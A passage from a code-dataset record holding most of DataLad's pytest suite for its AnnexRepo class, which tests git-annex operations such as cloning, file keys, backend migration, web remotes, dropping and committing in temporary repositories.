init=None))\n # ... 
where whatever was passed for init will be returned as is.\n assert_equal(\n ds.repo.get_content_annexinfo(\n paths=[], ref=\"HEAD\", init={\"random\": {\"entry\": \"a\"}}),\n {\"random\": {\"entry\": \"a\"}})\n\n\n@with_tempfile\ndef test_status_paths_empty_list(path=None):\n ds = Dataset(path).create()\n assert_equal(ds.repo.status(paths=[]), {})\n\n\n@with_tree(tree=(('ingit.txt', 'ingit'),\n ('inannex.txt', 'inannex'),\n ('dir1', {'dropped': 'dropped'}),\n ('dir2', {'d21': 'd21', 'd22': 'd22'})))\ndef test_get_file_annexinfo(path=None):\n ds = Dataset(path).create(force=True)\n ds.save('ingit.txt', to_git=True)\n ds.save()\n # have some content-less component for testing\n ds.drop(ds.pathobj / 'dir1', reckless='kill')\n\n repo = ds.repo\n # only handles a single file at a time\n assert_raises(ValueError, repo.get_file_annexinfo, repo.pathobj / 'dir2')\n # however, it only functionally matters that there is only a single file to\n # report on not that the exact query path matches, the matching path is in\n # the report\n assert_equal(\n repo.pathobj / 'dir1' / 'dropped',\n repo.get_file_annexinfo(repo.pathobj / 'dir1')['path'])\n\n # does not raise on a non-annex file, instead it returns no properties\n assert_equal(repo.get_file_annexinfo('ingit.txt'), {})\n\n # but does raise on path that doesn exist\n assert_raises(NoSuchPathError, repo.get_file_annexinfo, 'nothere')\n\n # check return properties for utility\n props = repo.get_file_annexinfo('inannex.txt')\n # to replace get_file_backend()\n assert_equal(props['backend'], 'MD5E')\n # to replace get_file_key()\n assert_equal(props['key'], 'MD5E-s7--3b158c5b0a18c247ebad28c09fc3e180.txt')\n # for size reporting\n assert_equal(props['bytesize'], 7)\n # all records have a pathobj\n assert_equal(props['path'], repo.pathobj / 'inannex.txt')\n # test if `eval_availability` has desired effect\n assert_not_in('has_content', props)\n\n # extended set of properties, after more expensive availability check\n props = repo.get_file_annexinfo('inannex.txt', eval_availability=True)\n # to replace file_has_content()\n assert_equal(props['has_content'], True)\n # to replace get_contentlocation()\n assert_equal(\n Path(props['objloc']).read_text(),\n 'inannex')\n\n # make sure has_content is not always True\n props = repo.get_file_annexinfo(\n ds.pathobj / 'dir1' / 'dropped', eval_availability=True)\n assert_equal(props['has_content'], False)\n assert_not_in('objloc', props)\n" }, { "alpha_fraction": 0.6220777034759521, "alphanum_fraction": 0.6345899701118469, "avg_line_length": 34.929969787597656, "blob_id": "605fef2763039c9ebec64a1401fd38c71004f434", "content_id": "df5c9b60bef06836f6e74f880612a6babeab582f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 99023, "license_type": "permissive", "max_line_length": 194, "num_lines": 2756, "path": "/datalad/support/tests/test_annexrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test implementation of class AnnexRepo\n\n\"\"\"\n\nimport gc\nimport json\nimport logging\nimport os\nimport re\nimport sys\nimport 
unittest.mock\nfrom functools import partial\nfrom glob import glob\nfrom os import mkdir\nfrom os.path import (\n basename,\n curdir,\n exists,\n)\nfrom os.path import join as opj\nfrom os.path import (\n pardir,\n relpath,\n)\nfrom queue import Queue\nfrom shutil import copyfile\nfrom unittest.mock import patch\nfrom urllib.parse import (\n urljoin,\n urlsplit,\n)\n\nimport pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import clone\nfrom datalad.cmd import GitWitlessRunner\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.consts import (\n DATALAD_SPECIAL_REMOTE,\n DATALAD_SPECIAL_REMOTES_UUIDS,\n WEB_SPECIAL_REMOTE_UUID,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.runner.gitrunner import GitWitlessRunner\nfrom datalad.support import path as op\n# imports from same module:\nfrom datalad.support.annexrepo import (\n AnnexJsonProtocol,\n AnnexRepo,\n GeneratorAnnexJsonNoStderrProtocol,\n GeneratorAnnexJsonProtocol,\n)\nfrom datalad.support.exceptions import (\n AnnexBatchCommandError,\n CommandError,\n FileInGitError,\n FileNotInAnnexError,\n FileNotInRepositoryError,\n IncompleteResultsError,\n InsufficientArgumentsError,\n MissingExternalDependency,\n OutdatedExternalDependency,\n OutOfSpaceError,\n RemoteNotAvailableError,\n)\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.sshconnector import get_connection_hash\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n OBSCURE_FILENAME,\n SkipTest,\n assert_cwd_unchanged,\n)\nfrom datalad.tests.utils_pytest import assert_dict_equal as deq_\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_false,\n assert_in,\n assert_is_instance,\n assert_not_equal,\n assert_not_in,\n assert_not_is_instance,\n assert_raises,\n assert_re_in,\n assert_repo_status,\n assert_result_count,\n assert_true,\n create_tree,\n eq_,\n find_files,\n get_most_obscure_supported_name,\n known_failure_githubci_win,\n known_failure_windows,\n maybe_adjust_repo,\n ok_,\n ok_annex_get,\n ok_file_has_content,\n ok_file_under_git,\n ok_git_config_not_empty,\n on_nfs,\n on_travis,\n serve_path_via_http,\n set_annex_version,\n skip_if,\n skip_if_adjusted_branch,\n skip_if_on_windows,\n skip_if_root,\n skip_nomultiplex_ssh,\n slow,\n swallow_logs,\n swallow_outputs,\n with_parametric_batch,\n with_sameas_remote,\n with_tempfile,\n with_tree,\n xfail_buggy_annex_info,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n get_linux_distribution,\n on_windows,\n quote_cmdlinearg,\n rmtree,\n unlink,\n)\n\n\n_GIT_ANNEX_VERSIONS_INFO = AnnexRepo.check_repository_versions()\n\n\n@assert_cwd_unchanged\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_instance_from_clone(src=None, dst=None):\n\n origin = AnnexRepo(src, create=True)\n ar = AnnexRepo.clone(src, dst)\n assert_is_instance(ar, AnnexRepo, \"AnnexRepo was not created.\")\n ok_(os.path.exists(os.path.join(dst, '.git', 'annex')))\n\n # do it again should raise ValueError since git will notice\n # there's already a git-repo at that path and therefore can't clone to `dst`\n with swallow_logs(new_level=logging.WARN) as cm:\n assert_raises(ValueError, AnnexRepo.clone, src, dst)\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_AnnexRepo_instance_from_existing(path=None):\n AnnexRepo(path, create=True)\n\n ar = AnnexRepo(path)\n assert_is_instance(ar, AnnexRepo, \"AnnexRepo was not created.\")\n ok_(os.path.exists(os.path.join(path, 
'.git')))\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_AnnexRepo_instance_brand_new(path=None):\n\n GitRepo(path)\n assert_raises(RuntimeError, AnnexRepo, path, create=False)\n\n ar = AnnexRepo(path)\n assert_is_instance(ar, AnnexRepo, \"AnnexRepo was not created.\")\n ok_(os.path.exists(os.path.join(path, '.git')))\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_AnnexRepo_crippled_filesystem(dst=None):\n\n ar = AnnexRepo(dst)\n\n # fake git-annex entries in .git/config:\n ar.config.set(\n \"annex.crippledfilesystem\",\n 'true',\n scope='local')\n ok_(ar.is_crippled_fs())\n ar.config.set(\n \"annex.crippledfilesystem\",\n 'false',\n scope='local')\n assert_false(ar.is_crippled_fs())\n # since we can't remove the entry, just rename it to fake its absence:\n ar.config.rename_section(\"annex\", \"removed\", scope='local')\n ar.config.set(\"annex.something\", \"value\", scope='local')\n assert_false(ar.is_crippled_fs())\n\n\n@known_failure_githubci_win\n@with_tempfile\n@assert_cwd_unchanged\ndef test_AnnexRepo_is_direct_mode(path=None):\n\n ar = AnnexRepo(path)\n eq_(ar.config.getbool(\"annex\", \"direct\", False),\n ar.is_direct_mode())\n\n\n@known_failure_githubci_win\n@with_tempfile()\ndef test_AnnexRepo_is_direct_mode_gitrepo(path=None):\n repo = GitRepo(path, create=True)\n # artificially make .git/annex so no annex section gets initialized\n # in .git/config. We did manage somehow to make this happen (via publish)\n # but didn't reproduce yet, so just creating manually\n mkdir(opj(repo.path, '.git', 'annex'))\n ar = AnnexRepo(path, init=False, create=False)\n # It is unlikely though that annex would be in direct mode (requires explicit)\n # annex magic, without having annex section under .git/config\n dm = ar.is_direct_mode()\n # no direct mode, ever\n assert_false(dm)\n\n\n# ignore warning since we are testing that function here. 
Remove upon full deprecation\[email protected](r\"ignore: AnnexRepo.get_file_key\\(\\) is deprecated\")\n@assert_cwd_unchanged\n@with_tempfile\ndef test_AnnexRepo_get_file_key(annex_path=None):\n\n ar = AnnexRepo(annex_path)\n (ar.pathobj / 'test.dat').write_text('123\\n')\n ar.save('test.dat', git=True)\n (ar.pathobj / 'test-annex.dat').write_text(\n \"content to be annex-addurl'd\")\n ar.save('some')\n\n # test-annex.dat should return the correct key:\n test_annex_key = \\\n 'SHA256E-s28' \\\n '--2795fb26981c5a687b9bf44930cc220029223f472cea0f0b17274f4473181e7b.dat'\n eq_(ar.get_file_key(\"test-annex.dat\"), test_annex_key)\n\n # and should take a list with an empty string as result, if a file wasn't\n # in annex:\n eq_(\n ar.get_file_key([\"filenotpresent.wtf\", \"test-annex.dat\"]),\n ['', test_annex_key]\n )\n\n # test.dat is actually in git\n # should raise Exception; also test for polymorphism\n assert_raises(IOError, ar.get_file_key, \"test.dat\")\n assert_raises(FileNotInAnnexError, ar.get_file_key, \"test.dat\")\n assert_raises(FileInGitError, ar.get_file_key, \"test.dat\")\n\n # filenotpresent.wtf doesn't even exist\n assert_raises(IOError, ar.get_file_key, \"filenotpresent.wtf\")\n\n # if we force batch mode, no failure for not present or not annexed files\n eq_(ar.get_file_key(\"filenotpresent.wtf\", batch=True), '')\n eq_(ar.get_file_key(\"test.dat\", batch=True), '')\n eq_(ar.get_file_key(\"test-annex.dat\", batch=True), test_annex_key)\n\n\n@with_tempfile(mkdir=True)\ndef test_AnnexRepo_get_outofspace(annex_path=None):\n ar = AnnexRepo(annex_path, create=True)\n\n def raise_cmderror(*args, **kwargs):\n raise CommandError(\n cmd=\"whatever\",\n stderr=\"junk around not enough free space, need 905.6 MB more and after\"\n )\n\n with patch.object(GitWitlessRunner, 'run_on_filelist_chunks', raise_cmderror) as cma, \\\n assert_raises(OutOfSpaceError) as cme:\n ar.get(\"file\")\n exc = cme.value\n eq_(exc.sizemore_msg, '905.6 MB')\n assert_re_in(\".*annex.*(find|get).*needs 905.6 MB more\", str(exc), re.DOTALL)\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get_remote_na(src=None, path=None):\n origin = AnnexRepo(src, create=True)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save()\n ar = AnnexRepo.clone(src, path)\n\n with assert_raises(RemoteNotAvailableError) as cme:\n ar.get('test-annex.dat', options=[\"--from=NotExistingRemote\"])\n eq_(cme.value.remote, \"NotExistingRemote\")\n\n # and similar one whenever invoking with remote parameter\n with assert_raises(RemoteNotAvailableError) as cme:\n ar.get('test-annex.dat', remote=\"NotExistingRemote\")\n eq_(cme.value.remote, \"NotExistingRemote\")\n\n\n@with_sameas_remote\ndef test_annex_repo_sameas_special(repo=None):\n remotes = repo.get_special_remotes()\n eq_(len(remotes), 2)\n rsync_info = [v for v in remotes.values()\n if v.get(\"sameas-name\") == \"r_rsync\"]\n eq_(len(rsync_info), 1)\n # r_rsync is a sameas remote that points to r_dir. 
Its sameas-name value\n # has been copied under \"name\".\n eq_(rsync_info[0][\"name\"], rsync_info[0][\"sameas-name\"])\n\n\n# 1 is enough to test file_has_content\n@with_parametric_batch\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_file_has_content(src=None, annex_path=None, *, batch):\n origin = AnnexRepo(src)\n (origin.pathobj / 'test.dat').write_text('123\\n')\n origin.save('test.dat', git=True)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save('some')\n ar = AnnexRepo.clone(src, annex_path)\n testfiles = [\"test-annex.dat\", \"test.dat\"]\n\n eq_(ar.file_has_content(testfiles), [False, False])\n\n ok_annex_get(ar, \"test-annex.dat\")\n eq_(ar.file_has_content(testfiles, batch=batch), [True, False])\n eq_(ar.file_has_content(testfiles[:1], batch=batch), [True])\n\n eq_(ar.file_has_content(testfiles + [\"bogus.txt\"], batch=batch),\n [True, False, False])\n\n assert_false(ar.file_has_content(\"bogus.txt\", batch=batch))\n ok_(ar.file_has_content(\"test-annex.dat\", batch=batch))\n\n ar.unlock([\"test-annex.dat\"])\n eq_(ar.file_has_content([\"test-annex.dat\"], batch=batch),\n [True])\n with open(opj(annex_path, \"test-annex.dat\"), \"a\") as ofh:\n ofh.write(\"more\")\n eq_(ar.file_has_content([\"test-annex.dat\"], batch=batch),\n [False])\n\n\n# 1 is enough to test\n@xfail_buggy_annex_info\n@with_parametric_batch\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_is_under_annex(src=None, annex_path=None, *, batch):\n origin = AnnexRepo(src)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save('some')\n ar = AnnexRepo.clone(src, annex_path)\n\n with open(opj(annex_path, 'not-committed.txt'), 'w') as f:\n f.write(\"aaa\")\n\n testfiles = [\"test-annex.dat\", \"not-committed.txt\", \"INFO.txt\"]\n # wouldn't change\n target_value = [True, False, False]\n eq_(ar.is_under_annex(testfiles, batch=batch), target_value)\n\n ok_annex_get(ar, \"test-annex.dat\")\n eq_(ar.is_under_annex(testfiles, batch=batch), target_value)\n eq_(ar.is_under_annex(testfiles[:1], batch=batch), target_value[:1])\n eq_(ar.is_under_annex(testfiles[1:], batch=batch), target_value[1:])\n\n eq_(ar.is_under_annex(testfiles + [\"bogus.txt\"], batch=batch),\n target_value + [False])\n\n assert_false(ar.is_under_annex(\"bogus.txt\", batch=batch))\n ok_(ar.is_under_annex(\"test-annex.dat\", batch=batch))\n\n ar.unlock([\"test-annex.dat\"])\n eq_(ar.is_under_annex([\"test-annex.dat\"], batch=batch),\n [True])\n with open(opj(annex_path, \"test-annex.dat\"), \"a\") as ofh:\n ofh.write(\"more\")\n eq_(ar.is_under_annex([\"test-annex.dat\"], batch=batch),\n [False])\n\n\n@xfail_buggy_annex_info\n@with_tree(tree=(('about.txt', 'Lots of abouts'),\n ('about2.txt', 'more abouts'),\n ('d', {'sub.txt': 'more stuff'})))\n@serve_path_via_http()\n@with_tempfile\ndef test_AnnexRepo_web_remote(sitepath=None, siteurl=None, dst=None):\n\n ar = AnnexRepo(dst, create=True)\n testurl = urljoin(siteurl, 'about.txt')\n testurl2 = urljoin(siteurl, 'about2.txt')\n testurl3 = urljoin(siteurl, 'd/sub.txt')\n url_file_prefix = urlsplit(testurl).netloc.split(':')[0]\n testfile = '%s_about.txt' % url_file_prefix\n testfile2 = '%s_about2.txt' % url_file_prefix\n testfile3 = opj('d', 'sub.txt')\n\n # get the file from remote\n with swallow_outputs() as cmo:\n ar.add_url_to_file(testfile, testurl)\n l = ar.whereis(testfile)\n assert_in(WEB_SPECIAL_REMOTE_UUID, l)\n eq_(len(l), 2)\n ok_(ar.file_has_content(testfile))\n\n # output='full'\n lfull = ar.whereis(testfile, output='full')\n eq_(set(lfull), 
set(l)) # the same entries\n non_web_remote = l[1 - l.index(WEB_SPECIAL_REMOTE_UUID)]\n assert_in('urls', lfull[non_web_remote])\n eq_(lfull[non_web_remote]['urls'], [])\n assert_not_in('uuid', lfull[WEB_SPECIAL_REMOTE_UUID]) # no uuid in the records\n eq_(lfull[WEB_SPECIAL_REMOTE_UUID]['urls'], [testurl])\n assert_equal(lfull[WEB_SPECIAL_REMOTE_UUID]['description'], 'web')\n\n # --all and --key are incompatible\n assert_raises(CommandError, ar.whereis, [testfile], options='--all', output='full', key=True)\n\n # output='descriptions'\n ldesc = ar.whereis(testfile, output='descriptions')\n eq_(set(ldesc), set([v['description'] for v in lfull.values()]))\n\n # info w/ and w/o fast mode\n for fast in [True, False]:\n info = ar.info(testfile, fast=fast)\n eq_(info['size'], 14)\n assert(info['key']) # that it is there\n info_batched = ar.info(testfile, batch=True, fast=fast)\n eq_(info, info_batched)\n # while at it ;)\n with swallow_outputs() as cmo:\n eq_(ar.info('nonexistent', batch=False), None)\n eq_(ar.info('nonexistent-batch', batch=True), None)\n eq_(cmo.out, '')\n eq_(cmo.err, '')\n ar.precommit() # to stop all the batched processes for swallow_outputs\n\n # annex repo info\n repo_info = ar.repo_info(fast=False)\n eq_(repo_info['local annex size'], 14)\n eq_(repo_info['backend usage'], {'SHA256E': 1})\n # annex repo info in fast mode\n repo_info_fast = ar.repo_info(fast=True)\n # doesn't give much testable info, so just comparing a subset for match with repo_info info\n eq_(repo_info_fast['semitrusted repositories'], repo_info['semitrusted repositories'])\n #import pprint; pprint.pprint(repo_info)\n\n # remove the remote\n ar.rm_url(testfile, testurl)\n l = ar.whereis(testfile)\n assert_not_in(WEB_SPECIAL_REMOTE_UUID, l)\n eq_(len(l), 1)\n\n # now only 1 copy; drop should fail\n try:\n res = ar.drop(testfile)\n except CommandError as e:\n # there should be at least one result that was captured\n # TODO think about a more standard way of accessing such\n # records in a CommandError, maybe having a more specialized\n # exception derived from CommandError\n res = e.kwargs['stdout_json'][0]\n eq_(res['command'], 'drop')\n eq_(res['success'], False)\n assert_in('adjust numcopies', res['note'])\n\n # read the url using different method\n ar.add_url_to_file(testfile, testurl)\n l = ar.whereis(testfile)\n assert_in(WEB_SPECIAL_REMOTE_UUID, l)\n eq_(len(l), 2)\n ok_(ar.file_has_content(testfile))\n\n # 2 known copies now; drop should succeed\n ar.drop(testfile)\n l = ar.whereis(testfile)\n assert_in(WEB_SPECIAL_REMOTE_UUID, l)\n eq_(len(l), 1)\n assert_false(ar.file_has_content(testfile))\n lfull = ar.whereis(testfile, output='full')\n assert_not_in(non_web_remote, lfull) # not present -- so not even listed\n\n # multiple files/urls\n # get the file from remote\n with swallow_outputs() as cmo:\n ar.add_url_to_file(testfile2, testurl2)\n\n # TODO: if we ask for whereis on all files, we should get for all files\n lall = ar.whereis('.')\n eq_(len(lall), 2)\n for e in lall:\n assert(isinstance(e, list))\n # but we don't know which one for which file. 
need a 'full' one for that\n lall_full = ar.whereis('.', output='full')\n ok_(ar.file_has_content(testfile2))\n ok_(lall_full[testfile2][non_web_remote]['here'])\n eq_(set(lall_full), {testfile, testfile2})\n\n # add a bogus 2nd url to testfile\n\n someurl = \"http://example.com/someurl\"\n ar.add_url_to_file(testfile, someurl, options=['--relaxed'])\n lfull = ar.whereis(testfile, output='full')\n eq_(set(lfull[WEB_SPECIAL_REMOTE_UUID]['urls']), {testurl, someurl})\n\n # and now test with a file in subdirectory\n subdir = opj(dst, 'd')\n os.mkdir(subdir)\n with swallow_outputs() as cmo:\n ar.add_url_to_file(testfile3, url=testurl3)\n ok_file_has_content(opj(dst, testfile3), 'more stuff')\n eq_(set(ar.whereis(testfile3)), {WEB_SPECIAL_REMOTE_UUID, non_web_remote})\n eq_(set(ar.whereis(testfile3, output='full').keys()), {WEB_SPECIAL_REMOTE_UUID, non_web_remote})\n\n # and if we ask for both files\n info2 = ar.info([testfile, testfile3])\n eq_(set(info2), {testfile, testfile3})\n eq_(info2[testfile3]['size'], 10)\n\n full = ar.whereis([], options='--all', output='full')\n eq_(len(full.keys()), 3) # we asked for all files -- got 3 keys\n assert_in(WEB_SPECIAL_REMOTE_UUID, full['SHA256E-s10--a978713ea759207f7a6f9ebc9eaebd1b40a69ae408410ddf544463f6d33a30e1.txt'])\n\n # which would work even if we cd to that subdir, but then we should use explicit curdir\n with chpwd(subdir):\n cur_subfile = opj(curdir, 'sub.txt')\n eq_(set(ar.whereis(cur_subfile)), {WEB_SPECIAL_REMOTE_UUID, non_web_remote})\n eq_(set(ar.whereis(cur_subfile, output='full').keys()), {WEB_SPECIAL_REMOTE_UUID, non_web_remote})\n testfiles = [cur_subfile, opj(pardir, testfile)]\n info2_ = ar.info(testfiles)\n # Should maintain original relative file names\n eq_(set(info2_), set(testfiles))\n eq_(info2_[cur_subfile]['size'], 10)\n\n\n@with_tree(tree={\"a.txt\": \"a\",\n \"b\": \"b\",\n OBSCURE_FILENAME: \"c\",\n \"subdir\": {\"d\": \"d\", \"e\": \"e\"}})\ndef test_find_batch_equivalence(path=None):\n ar = AnnexRepo(path)\n files = [\"a.txt\", \"b\", OBSCURE_FILENAME]\n ar.add(files + [\"subdir\"])\n ar.commit(\"add files\")\n query = [\"not-there\"] + files\n expected = {f: f for f in files}\n expected.update({\"not-there\": \"\"})\n eq_(expected, ar.find(query, batch=True))\n eq_(expected, ar.find(query))\n # If we give a subdirectory, we split that output.\n eq_(set(ar.find([\"subdir\"])[\"subdir\"]), {\"subdir/d\", \"subdir/e\"})\n eq_(ar.find([\"subdir\"]), ar.find([\"subdir\"], batch=True))\n # manually ensure that no annex batch processes are around anymore\n # that make the test cleanup break on windows.\n # story at https://github.com/datalad/datalad/issues/4190\n # even an explicit `del ar` does not get it done\n ar._batched.close()\n\n\n@with_tempfile(mkdir=True)\ndef test_repo_info(path=None):\n repo = AnnexRepo(path)\n info = repo.repo_info() # works in empty repo without crashing\n eq_(info['local annex size'], 0)\n eq_(info['size of annexed files in working tree'], 0)\n\n def get_custom(custom={}):\n \"\"\"Need a helper since repo_info modifies in place so we should generate\n new each time\n \"\"\"\n custom_json = {\n 'available local disk space': 'unknown',\n 'size of annexed files in working tree': \"0\",\n 'success': True,\n 'command': 'info',\n }\n if custom:\n custom_json.update(custom)\n return [custom_json]\n\n with patch.object(\n repo, '_call_annex_records',\n return_value=get_custom()):\n info = repo.repo_info()\n eq_(info['available local disk space'], None)\n\n with patch.object(\n repo, 
'_call_annex_records',\n return_value=get_custom({\n \"available local disk space\": \"19193986496 (+100000 reserved)\"})):\n info = repo.repo_info()\n eq_(info['available local disk space'], 19193986496)\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_migrating_backends(src=None, dst=None):\n origin = AnnexRepo(src)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save('some')\n ar = AnnexRepo.clone(src, dst, backend='MD5')\n eq_(ar.default_backends, ['MD5'])\n # GitPython has a bug which causes .git/config being wiped out\n # under Python3, triggered by collecting its config instance I guess\n gc.collect()\n ok_git_config_not_empty(ar) # Must not blow, see https://github.com/gitpython-developers/GitPython/issues/333\n\n filename = get_most_obscure_supported_name()\n filename_abs = os.path.join(dst, filename)\n f = open(filename_abs, 'w')\n f.write(\"What to write?\")\n f.close()\n\n ar.add(filename, backend='MD5')\n eq_(ar.get_file_backend(filename), 'MD5')\n eq_(ar.get_file_backend('test-annex.dat'), 'SHA256E')\n\n # migrating will only do, if file is present\n ok_annex_get(ar, 'test-annex.dat')\n\n eq_(ar.get_file_backend('test-annex.dat'), 'SHA256E')\n ar.migrate_backend('test-annex.dat')\n eq_(ar.get_file_backend('test-annex.dat'), 'MD5')\n\n ar.migrate_backend('', backend='SHA1')\n eq_(ar.get_file_backend(filename), 'SHA1')\n eq_(ar.get_file_backend('test-annex.dat'), 'SHA1')\n\n\ntree1args = dict(\n tree=(\n ('firstfile', 'whatever'),\n ('secondfile', 'something else'),\n ('remotefile', 'pretends to be remote'),\n ('faraway', 'incredibly remote')),\n)\n\n# keys for files if above tree is generated and added to annex with MD5E backend\ntree1_md5e_keys = {\n 'firstfile': 'MD5E-s8--008c5926ca861023c1d2a36653fd88e2',\n 'faraway': 'MD5E-s17--5b849ed02f914d3bbb5038fe4e3fead9',\n 'secondfile': 'MD5E-s14--6c7ba9c5a141421e1c03cb9807c97c74',\n 'remotefile': 'MD5E-s21--bf7654b3de20d5926d407ea7d913deb0'\n}\n\n# this code is only here for documentation purposes\n# @with_tree(**tree1args)\n# def __test_get_md5s(path):\n# # was used just to generate above dict\n# annex = AnnexRepo(path, init=True, backend='MD5E')\n# files = [basename(f) for f in find_files('.*', path)]\n# annex.add(files)\n# annex.commit()\n# print({f: p['key'] for f, p in annex.get_content_annexinfo(files)})\n\n\n@with_parametric_batch\n@with_tree(**tree1args)\ndef test_dropkey(path=None, *, batch):\n kw = {'batch': batch}\n annex = AnnexRepo(path, init=True, backend='MD5E')\n files = list(tree1_md5e_keys)\n annex.add(files)\n annex.commit()\n # drop one key\n annex.drop_key(tree1_md5e_keys[files[0]], **kw)\n # drop multiple\n annex.drop_key([tree1_md5e_keys[f] for f in files[1:3]], **kw)\n # drop already dropped -- should work as well atm\n # https://git-annex.branchable.com/bugs/dropkey_--batch_--json_--force_is_always_succesfull\n annex.drop_key(tree1_md5e_keys[files[0]], **kw)\n # and a mix with already dropped or not\n annex.drop_key(list(tree1_md5e_keys.values()), **kw)\n # AnnexRepo is not able to guarantee that all batched processes are\n # terminated when test cleanup code runs, avoid a crash (i.e. 
resource busy)\n annex._batched.close()\n\n\n@with_tree(**tree1args)\n@serve_path_via_http()\ndef test_AnnexRepo_backend_option(path=None, url=None):\n ar = AnnexRepo(path, backend='MD5')\n\n # backend recorded in .gitattributes\n eq_(ar.get_gitattributes('.')['.']['annex.backend'], 'MD5')\n\n ar.add('firstfile', backend='SHA1')\n ar.add('secondfile')\n eq_(ar.get_file_backend('firstfile'), 'SHA1')\n eq_(ar.get_file_backend('secondfile'), 'MD5')\n\n with swallow_outputs() as cmo:\n # must be added under different name since annex 20160114\n ar.add_url_to_file('remotefile2', url + 'remotefile', backend='SHA1')\n eq_(ar.get_file_backend('remotefile2'), 'SHA1')\n\n with swallow_outputs() as cmo:\n ar.add_url_to_file('from_faraway', url + 'faraway', backend='SHA1')\n eq_(ar.get_file_backend('from_faraway'), 'SHA1')\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get_file_backend(src=None, dst=None):\n origin = AnnexRepo(src, create=True)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save()\n\n ar = AnnexRepo.clone(src, dst)\n\n eq_(ar.get_file_backend('test-annex.dat'), 'SHA256E')\n # no migration\n ok_annex_get(ar, 'test-annex.dat', network=False)\n ar.migrate_backend('test-annex.dat', backend='SHA1')\n eq_(ar.get_file_backend('test-annex.dat'), 'SHA1')\n\n\n@skip_if_adjusted_branch\n@with_tempfile\ndef test_AnnexRepo_always_commit(path=None):\n\n repo = AnnexRepo(path)\n\n def get_annex_commit_counts():\n return len(repo.get_revisions(\"git-annex\"))\n\n n_annex_commits_initial = get_annex_commit_counts()\n\n file1 = get_most_obscure_supported_name() + \"_1\"\n file2 = get_most_obscure_supported_name() + \"_2\"\n with open(opj(path, file1), 'w') as f:\n f.write(\"First file.\")\n with open(opj(path, file2), 'w') as f:\n f.write(\"Second file.\")\n\n # always_commit == True is expected to be default\n repo.add(file1)\n\n # Now git-annex log should show the addition:\n out_list = list(repo.call_annex_items_(['log']))\n eq_(len(out_list), 1)\n\n quote = lambda s: s.replace('\"', r'\\\"')\n def assert_in_out(filename, out):\n filename_quoted = quote(filename)\n if repo._check_version_kludges('quotepath-respected') == \"no\":\n assert_in(filename, out)\n elif repo._check_version_kludges('quotepath-respected') == \"maybe\":\n assert filename in out or filename_quoted in out\n else:\n assert_in(filename_quoted, out)\n assert_in_out(file1, out_list[0])\n\n # check git log of git-annex branch:\n # expected: initial creation, update (by annex add) and another\n # update (by annex log)\n eq_(get_annex_commit_counts(), n_annex_commits_initial + 1)\n\n with patch.object(repo, \"always_commit\", False):\n repo.add(file2)\n\n # No additional git commit:\n eq_(get_annex_commit_counts(), n_annex_commits_initial + 1)\n\n out = repo.call_annex(['log'])\n\n # And we see only the file before always_commit was set to false:\n assert_in_out(file1, out)\n assert_not_in(file2, out)\n assert_not_in(quote(file2), out)\n\n # With always_commit back to True, do something that will trigger a commit\n # on the annex branches.\n repo.call_annex(['sync'])\n\n out = repo.call_annex(['log'])\n assert_in_out(file1, out)\n assert_in_out(file2, out)\n\n # Now git knows as well:\n eq_(get_annex_commit_counts(), n_annex_commits_initial + 2)\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_on_uninited_annex(src=None, path=None):\n origin = AnnexRepo(src, create=True)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save()\n # \"Manually\" clone to avoid initialization:\n 
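    # (editor's note, not part of the original test) A plain `git clone` copies
    # the git-annex branch but does not create .git/annex/ or set annex.uuid;
    # that normally only happens on `git annex init`. Because the clone carries
    # a git-annex branch, git-annex is expected to auto-initialize it the first
    # time an annex command (the get() further below) runs in it, which is what
    # this test relies on. Illustrative CLI equivalent of the manual clone:
    #   git clone <origin-path> <clone-path>   # paths are placeholders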
runner = Runner()\n runner.run([\"git\", \"clone\", origin.path, path])\n\n assert_false(exists(opj(path, '.git', 'annex'))) # must not be there for this test to be valid\n annex = AnnexRepo(path, create=False, init=False) # so we can initialize without\n # and still can get our things\n assert_false(annex.file_has_content('test-annex.dat'))\n annex.get('test-annex.dat')\n ok_(annex.file_has_content('test-annex.dat'))\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_AnnexRepo_commit(path=None):\n\n ds = AnnexRepo(path, create=True)\n filename = opj(path, get_most_obscure_supported_name())\n with open(filename, 'w') as f:\n f.write(\"File to add to git\")\n ds.add(filename, git=True)\n\n assert_raises(AssertionError, assert_repo_status, path, annex=True)\n\n ds.commit(\"test _commit\")\n assert_repo_status(path, annex=True)\n\n # nothing to commit doesn't raise by default:\n ds.commit()\n # but does with careless=False:\n assert_raises(CommandError, ds.commit, careless=False)\n\n # committing untracked file raises:\n with open(opj(path, 